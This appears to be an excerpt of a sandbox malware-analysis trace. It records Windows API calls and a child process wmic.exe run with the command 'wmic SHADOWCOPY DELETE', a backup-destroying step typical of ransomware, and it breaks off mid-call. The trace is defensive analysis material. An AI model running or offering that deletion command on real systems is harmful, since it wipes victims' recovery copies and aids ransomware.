[0155.803] GetProcessHeap () returned 0x3300000 [0155.803] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x33101b8) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x33101b8) returned 0x14 [0155.803] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x33101b8) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3307c78) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3307c78) returned 0x10 [0155.803] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3307c78) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330ce70) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330ce70) returned 0x14 [0155.803] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330ce70) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330cf90) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330cf90) returned 0x14 [0155.803] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330cf90) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330ceb0) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330ceb0) returned 0x14 [0155.803] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330ceb0) returned 1 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] GetProcessHeap () returned 0x3300000 [0155.803] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d030) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d030) returned 0x14 [0155.804] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d030) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3307dc8) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3307dc8) returned 0x10 [0155.804] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3307dc8) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d0b0) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d0b0) returned 0x14 [0155.804] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d0b0) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d170) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d170) returned 0x14 [0155.804] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d170) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330ce90) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330ce90) returned 0x14 [0155.804] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330ce90) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d0f0) returned 1 [0155.804] GetProcessHeap () returned 0x3300000 [0155.804] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d0f0) returned 0x14 [0155.805] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d0f0) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330ced0) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330ced0) returned 0x14 [0155.805] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330ced0) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3307ca8) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3307ca8) returned 0x10 [0155.805] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3307ca8) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x330d090) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x330d090) returned 0x14 [0155.805] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x330d090) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] HeapValidate (hHeap=0x3300000, dwFlags=0x0, lpMem=0x3307db0) returned 1 [0155.805] GetProcessHeap () returned 0x3300000 [0155.805] RtlSizeHeap (HeapHandle=0x3300000, Flags=0x0, MemoryPointer=0x3307db0) returned 0x10 [0155.805] RtlFreeHeap (HeapHandle=0x3300000, Flags=0x0, BaseAddress=0x3307db0) returned 1 [0155.805] exit (_Code=0) Thread: id = 35 os_tid = 0xa70 Process: id = "8" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0xfeea000" os_pid = "0x564" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xf74" cmd_line = "wmic SHADOWCOPY DELETE " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0xafc [0118.031] GetModuleHandleA (lpModuleName=0x0) returned 0xf0000 [0118.031] __set_app_type (_Type=0x1) [0118.031] __p__fmode () returned 0x776f3c14 [0118.031] __p__commode () returned 0x776f49ec [0118.031] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x129af0) returned 0x0 [0118.031] __wgetmainargs (in: _Argc=0x1381a8, _Argv=0x1381ac, _Env=0x1381b0, _DoWildCard=0, _StartInfo=0x1381bc | out: _Argc=0x1381a8, _Argv=0x1381ac, _Env=0x1381b0) returned 0 [0118.032] ??0CHString@@QAE@XZ () returned 0x1385ec [0118.032] malloc (_Size=0x18) returned 0x3300ec0 [0118.032] malloc (_Size=0x38) returned 0x3300ee0 [0118.032] malloc (_Size=0x28) returned 0x3300f20 [0118.032] malloc (_Size=0x18) returned 0x3300f50 [0118.032] malloc (_Size=0x24) returned 0x3300f70 [0118.032] malloc (_Size=0x18) returned 0x3300fa0 [0118.032] malloc (_Size=0x18) returned 0x3300fc0 [0118.033] ??0CHString@@QAE@XZ () returned 0x1388fc [0118.033] malloc (_Size=0x18) returned 0x3300fe0 [0118.033] ?Empty@CHString@@QAEXXZ () returned 0x732365f8 [0118.033] SetConsoleCtrlHandler (HandlerRoutine=0x123cc0, Add=1) returned 1 [0118.033] _onexit (_Func=0x12f370) returned 0x12f370 [0118.033] _onexit (_Func=0x12f380) returned 0x12f380 [0118.033] _onexit (_Func=0x12f390) returned 0x12f390 [0118.033] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.033] ResolveDelayLoadedAPI () returned 0x74a22590 [0118.034] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0118.039] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0132.626] CoCreateInstance (in: rclsid=0xf6a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xf6a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x138510 | out: ppv=0x138510*=0x30f3d70) returned 0x0 [0135.167] GetCurrentProcess () returned 0xffffffff [0135.167] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2d0f784 | out: TokenHandle=0x2d0f784*=0x1a0) returned 1 [0135.167] GetTokenInformation (in: TokenHandle=0x1a0, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2d0f780 | out: TokenInformation=0x0, ReturnLength=0x2d0f780) returned 0 [0135.167] malloc (_Size=0x118) returned 0x3302588 [0135.167] GetTokenInformation (in: TokenHandle=0x1a0, TokenInformationClass=0x3, TokenInformation=0x3302588, TokenInformationLength=0x118, ReturnLength=0x2d0f780 | out: TokenInformation=0x3302588, ReturnLength=0x2d0f780) returned 1 [0135.167] AdjustTokenPrivileges (in: TokenHandle=0x1a0, DisableAllPrivileges=0, NewState=0x3302588*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0135.167] free (_Block=0x3302588) [0135.167] CloseHandle (hObject=0x1a0) returned 1 [0135.167] malloc (_Size=0x40) returned 0x3302588 [0135.168] malloc (_Size=0x40) returned 0x33025d0 [0135.168] malloc (_Size=0x40) returned 0x3302618 [0135.168] SetThreadUILanguage (LangId=0x0) returned 0x2ee0409 [0135.682] _vsnwprintf (in: _Buffer=0x3302618, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x2d0f70c | out: _Buffer="ms_409") returned 6 [0135.682] malloc (_Size=0x20) returned 0x3302660 [0135.682] GetComputerNameW (in: lpBuffer=0x3302660, nSize=0x2d0f770 | out: lpBuffer="NQDPDE", nSize=0x2d0f770) returned 1 [0135.682] lstrlenW (lpString="NQDPDE") returned 6 [0135.682] malloc (_Size=0xe) returned 0x3302688 [0135.682] lstrlenW (lpString="NQDPDE") returned 6 [0135.682] ResolveDelayLoadedAPI () returned 0x7444db00 [0135.683] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x2d0f784 | out: lpNameBuffer=0x0, nSize=0x2d0f784) returned 0x2ee5000 [0135.685] GetLastError () returned 0xea [0135.685] malloc (_Size=0x1e) returned 0x33026a0 [0135.685] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x33026a0, nSize=0x2d0f784 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x2d0f784) returned 0x1 [0135.686] lstrlenW (lpString="") returned 0 [0135.686] lstrlenW (lpString="NQDPDE") returned 6 [0135.686] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0135.688] lstrlenW (lpString=".") returned 1 [0135.688] lstrlenW (lpString="NQDPDE") returned 6 [0135.688] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0135.689] lstrlenW (lpString="LOCALHOST") returned 9 [0135.689] lstrlenW (lpString="NQDPDE") returned 6 [0135.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0135.689] lstrlenW (lpString="NQDPDE") returned 6 [0135.689] lstrlenW (lpString="NQDPDE") returned 6 [0135.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0135.689] free (_Block=0x3302688) [0135.689] lstrlenW (lpString="NQDPDE") returned 6 [0135.689] malloc (_Size=0xe) returned 0x3302688 [0135.689] lstrlenW (lpString="NQDPDE") returned 6 [0135.689] lstrlenW (lpString="NQDPDE") returned 6 [0135.689] malloc (_Size=0xe) returned 0x33026c8 [0135.689] lstrlenW (lpString="NQDPDE") returned 6 [0135.689] malloc (_Size=0x4) returned 0x33011d8 [0135.689] malloc (_Size=0xc) returned 0x33026e0 [0135.689] ResolveDelayLoadedAPI () returned 0x7745b870 [0135.701] malloc (_Size=0x18) returned 0x33026f8 [0135.701] malloc (_Size=0xc) returned 0x3302718 [0135.701] SysStringLen (param_1="IDENTIFY") returned 0x8 [0135.701] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0135.701] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0135.701] SysStringLen (param_1="IDENTIFY") returned 0x8 [0135.701] malloc (_Size=0x18) returned 0x3302730 [0135.701] malloc (_Size=0xc) returned 0x3302750 [0135.701] SysStringLen (param_1="IMPERSONATE") returned 0xb [0135.701] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0135.701] SysStringLen (param_1="IMPERSONATE") returned 0xb [0135.701] SysStringLen (param_1="IDENTIFY") returned 0x8 [0135.701] SysStringLen (param_1="IDENTIFY") returned 0x8 [0135.701] SysStringLen (param_1="IMPERSONATE") returned 0xb [0135.701] malloc (_Size=0x18) returned 0x3302768 [0135.701] malloc (_Size=0xc) returned 0x3302788 [0135.701] SysStringLen (param_1="DELEGATE") returned 0x8 [0135.926] SysStringLen (param_1="IDENTIFY") returned 0x8 [0135.926] SysStringLen (param_1="DELEGATE") returned 0x8 [0135.926] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0135.926] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0135.926] SysStringLen (param_1="DELEGATE") returned 0x8 [0135.926] malloc (_Size=0x18) returned 0x33027a0 [0135.926] malloc (_Size=0xc) returned 0x33027c0 [0135.926] malloc (_Size=0x18) returned 0x33027d8 [0135.926] malloc (_Size=0xc) returned 0x33027f8 [0135.926] SysStringLen (param_1="NONE") returned 0x4 [0135.926] SysStringLen (param_1="DEFAULT") returned 0x7 [0135.926] SysStringLen (param_1="DEFAULT") returned 0x7 [0135.926] SysStringLen (param_1="NONE") returned 0x4 [0135.926] malloc (_Size=0x18) returned 0x3302810 [0135.926] malloc (_Size=0xc) returned 0x3302830 [0135.926] SysStringLen (param_1="CONNECT") returned 0x7 [0135.926] SysStringLen (param_1="DEFAULT") returned 0x7 [0135.926] malloc (_Size=0x18) returned 0x3302848 [0135.926] malloc (_Size=0xc) returned 0x33004a0 [0135.928] SysStringLen (param_1="CALL") returned 0x4 [0135.928] SysStringLen (param_1="DEFAULT") returned 0x7 [0135.928] SysStringLen (param_1="CALL") returned 0x4 [0135.928] SysStringLen (param_1="CONNECT") returned 0x7 [0135.928] malloc (_Size=0x18) returned 0x33004b8 [0135.928] malloc (_Size=0xc) returned 0x33004d8 [0135.928] SysStringLen (param_1="PKT") returned 0x3 [0135.928] SysStringLen (param_1="DEFAULT") returned 0x7 [0135.928] SysStringLen (param_1="PKT") returned 0x3 [0135.928] SysStringLen (param_1="NONE") returned 0x4 [0135.928] SysStringLen (param_1="NONE") returned 0x4 [0135.928] SysStringLen (param_1="PKT") returned 0x3 [0135.928] malloc (_Size=0x18) returned 0x33029d0 [0135.928] malloc (_Size=0xc) returned 0x33004f0 [0135.928] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0135.928] SysStringLen (param_1="DEFAULT") returned 0x7 [0135.928] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0135.928] SysStringLen (param_1="NONE") returned 0x4 [0135.928] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0135.928] SysStringLen (param_1="PKT") returned 0x3 [0135.928] SysStringLen (param_1="PKT") returned 0x3 [0135.928] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0135.928] malloc (_Size=0x18) returned 0x3302bf0 [0135.928] malloc (_Size=0xc) returned 0x3300508 [0135.929] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0135.929] SysStringLen (param_1="DEFAULT") returned 0x7 [0135.929] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0135.929] SysStringLen (param_1="PKT") returned 0x3 [0135.929] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0135.929] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0135.929] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0135.929] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0135.929] malloc (_Size=0x18) returned 0x33029f0 [0135.929] malloc (_Size=0x40) returned 0x3300520 [0135.929] malloc (_Size=0x20a) returned 0x3309568 [0135.929] GetSystemDirectoryW (in: lpBuffer=0x3309568, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.929] free (_Block=0x3309568) [0135.929] malloc (_Size=0xc) returned 0x3300568 [0135.929] malloc (_Size=0xc) returned 0x3300580 [0135.929] malloc (_Size=0xc) returned 0x3302c70 [0135.929] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0135.929] SysStringLen (param_1="\\wbem\\") returned 0x6 [0135.930] free (_Block=0x3300568) [0135.930] free (_Block=0x3300580) [0135.930] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0135.930] free (_Block=0x3302c70) [0135.930] malloc (_Size=0xc) returned 0x33095c0 [0135.930] malloc (_Size=0xc) returned 0x33096c8 [0135.930] malloc (_Size=0xc) returned 0x33095a8 [0135.930] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0135.930] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0135.930] free (_Block=0x33095c0) [0135.930] free (_Block=0x33096c8) [0135.930] GetCurrentThreadId () returned 0xafc [0135.931] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x2d0f294 | out: phkResult=0x2d0f294*=0x1ac) returned 0x0 [0135.931] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x2d0f2a0, lpcbData=0x2d0f29c*=0x400 | out: lpType=0x0, lpData=0x2d0f2a0*=0x30, lpcbData=0x2d0f29c*=0x4) returned 0x0 [0135.931] _wcsicmp (_String1="0", _String2="1") returned -1 [0135.931] _wcsicmp (_String1="0", _String2="2") returned -2 [0135.931] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x2d0f29c*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x2d0f29c*=0x42) returned 0x0 [0135.931] malloc (_Size=0x86) returned 0x3302c70 [0135.931] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x3302c70, lpcbData=0x2d0f29c*=0x42 | out: lpType=0x0, lpData=0x3302c70*=0x25, lpcbData=0x2d0f29c*=0x42) returned 0x0 [0135.931] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0135.931] malloc (_Size=0x42) returned 0x3302d00 [0135.931] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0135.931] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x2d0f2a0, lpcbData=0x2d0f29c*=0x400 | out: lpType=0x0, lpData=0x2d0f2a0*=0x36, lpcbData=0x2d0f29c*=0xc) returned 0x0 [0135.931] _wtol (_String="65536") returned 65536 [0135.931] free (_Block=0x3302c70) [0135.931] RegCloseKey (hKey=0x0) returned 0x6 [0135.931] CoCreateInstance (in: rclsid=0xf6ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xf6ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x2d0f730 | out: ppv=0x2d0f730*=0x37b45a8) returned 0x0 [0137.542] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x37b45a8, xmlSource=0x2d0f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x2d0f71c | out: isSuccessful=0x2d0f71c*=0xffff) returned 0x0 [0142.467] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x37b45a8, DOMElement=0x2d0f72c | out: DOMElement=0x2d0f72c) returned 0x0 [0142.467] malloc (_Size=0xc) returned 0x33095f0 [0142.468] free (_Block=0x33095f0) [0142.469] malloc (_Size=0xc) returned 0x33096e0 [0142.469] free (_Block=0x33096e0) [0142.469] malloc (_Size=0xc) returned 0x33095d8 [0142.469] malloc (_Size=0xc) returned 0x3309620 [0142.469] malloc (_Size=0x18) returned 0x3302950 [0142.470] malloc (_Size=0xc) returned 0x3309680 [0142.470] free (_Block=0x3309680) [0142.470] malloc (_Size=0xc) returned 0x3309638 [0142.470] malloc (_Size=0xc) returned 0x3309680 [0142.470] SysStringLen (param_1="VALUE") returned 0x5 [0142.470] SysStringLen (param_1="TABLE") returned 0x5 [0142.470] SysStringLen (param_1="TABLE") returned 0x5 [0142.470] SysStringLen (param_1="VALUE") returned 0x5 [0142.470] malloc (_Size=0x18) returned 0x3302930 [0142.470] malloc (_Size=0xc) returned 0x33096b0 [0142.471] free (_Block=0x33096b0) [0142.471] malloc (_Size=0xc) returned 0x33096f8 [0142.471] malloc (_Size=0xc) returned 0x3309698 [0142.471] SysStringLen (param_1="LIST") returned 0x4 [0142.471] SysStringLen (param_1="TABLE") returned 0x5 [0142.471] malloc (_Size=0x18) returned 0x3302a30 [0142.471] malloc (_Size=0xc) returned 0x33095f0 [0142.471] free (_Block=0x33095f0) [0142.471] malloc (_Size=0xc) returned 0x3309590 [0142.471] malloc (_Size=0xc) returned 0x33095f0 [0142.471] SysStringLen (param_1="RAWXML") returned 0x6 [0142.471] SysStringLen (param_1="TABLE") returned 0x5 [0142.471] SysStringLen (param_1="RAWXML") returned 0x6 [0142.471] SysStringLen (param_1="LIST") returned 0x4 [0142.471] SysStringLen (param_1="LIST") returned 0x4 [0142.472] SysStringLen (param_1="RAWXML") returned 0x6 [0142.472] malloc (_Size=0x18) returned 0x3302a10 [0142.472] malloc (_Size=0xc) returned 0x33095c0 [0142.472] free (_Block=0x33095c0) [0142.472] malloc (_Size=0xc) returned 0x33096e0 [0142.472] malloc (_Size=0xc) returned 0x3309710 [0142.472] SysStringLen (param_1="HTABLE") returned 0x6 [0142.472] SysStringLen (param_1="TABLE") returned 0x5 [0142.472] SysStringLen (param_1="HTABLE") returned 0x6 [0142.472] SysStringLen (param_1="LIST") returned 0x4 [0142.472] malloc (_Size=0x18) returned 0x3302c30 [0142.473] malloc (_Size=0xc) returned 0x33096b0 [0142.473] free (_Block=0x33096b0) [0142.473] malloc (_Size=0xc) returned 0x3309728 [0142.473] malloc (_Size=0xc) returned 0x33095c0 [0142.473] SysStringLen (param_1="HFORM") returned 0x5 [0142.473] SysStringLen (param_1="TABLE") returned 0x5 [0142.473] SysStringLen (param_1="HFORM") returned 0x5 [0142.473] SysStringLen (param_1="LIST") returned 0x4 [0142.473] SysStringLen (param_1="HFORM") returned 0x5 [0142.473] SysStringLen (param_1="HTABLE") returned 0x6 [0142.473] malloc (_Size=0x18) returned 0x3302a70 [0142.473] malloc (_Size=0xc) returned 0x3309650 [0142.473] free (_Block=0x3309650) [0142.474] malloc (_Size=0xc) returned 0x3309740 [0142.474] malloc (_Size=0xc) returned 0x3309650 [0142.474] SysStringLen (param_1="XML") returned 0x3 [0142.474] SysStringLen (param_1="TABLE") returned 0x5 [0142.474] SysStringLen (param_1="XML") returned 0x3 [0142.474] SysStringLen (param_1="VALUE") returned 0x5 [0142.474] SysStringLen (param_1="VALUE") returned 0x5 [0142.474] SysStringLen (param_1="XML") returned 0x3 [0142.474] malloc (_Size=0x18) returned 0x3302970 [0142.519] malloc (_Size=0xc) returned 0x3309758 [0142.519] free (_Block=0x3309758) [0142.519] malloc (_Size=0xc) returned 0x3309758 [0142.519] malloc (_Size=0xc) returned 0x3309668 [0142.519] SysStringLen (param_1="MOF") returned 0x3 [0142.519] SysStringLen (param_1="TABLE") returned 0x5 [0142.519] SysStringLen (param_1="MOF") returned 0x3 [0142.519] SysStringLen (param_1="LIST") returned 0x4 [0142.519] SysStringLen (param_1="MOF") returned 0x3 [0142.519] SysStringLen (param_1="RAWXML") returned 0x6 [0142.519] SysStringLen (param_1="LIST") returned 0x4 [0142.519] SysStringLen (param_1="MOF") returned 0x3 [0142.520] malloc (_Size=0x18) returned 0x3302c50 [0142.520] malloc (_Size=0xc) returned 0x3309608 [0142.520] free (_Block=0x3309608) [0142.520] malloc (_Size=0xc) returned 0x3309608 [0142.520] malloc (_Size=0xc) returned 0x33096b0 [0142.520] SysStringLen (param_1="CSV") returned 0x3 [0142.520] SysStringLen (param_1="TABLE") returned 0x5 [0142.520] SysStringLen (param_1="CSV") returned 0x3 [0142.520] SysStringLen (param_1="LIST") returned 0x4 [0142.520] SysStringLen (param_1="CSV") returned 0x3 [0142.520] SysStringLen (param_1="HTABLE") returned 0x6 [0142.520] SysStringLen (param_1="CSV") returned 0x3 [0142.520] SysStringLen (param_1="HFORM") returned 0x5 [0142.520] malloc (_Size=0x18) returned 0x3302b90 [0142.521] malloc (_Size=0xc) returned 